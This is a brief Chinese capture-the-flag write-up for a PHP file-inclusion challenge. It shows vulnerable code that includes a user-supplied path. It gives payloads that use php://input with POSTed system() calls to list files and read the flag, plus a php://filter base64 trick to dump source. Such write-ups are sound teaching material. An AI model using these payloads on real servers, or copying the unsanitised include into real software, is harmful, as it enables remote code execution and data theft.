Web include
题目内容:没错!就是文件包含漏洞。
页面显示出了phpinfo.php
的信息以及php源码
<?php
show_source(__FILE__);
if(isset($_REQUEST['path'])){
include($_REQUEST['path']);
}else{
include('phpinfo.php');
}
发现可以直接对path进行利用,构造path=php://input,同时post : <?php echo system('ls');?>
http://xxx.changame.ichunqiu.com/?path=php://input
<?php echo system('ls');?>
将post的内容改为
<?php echo system('cat dle345aae.php');?>
就能在源码中看到flag
也可以通过
http://caa2027b0a324688900cbe809b1ab644d9619be7224b4987.changame.ichunqiu.com/?path=php://filter/read=convert.base64-encode/resource=dle345aae.php
base64解密即可得到答案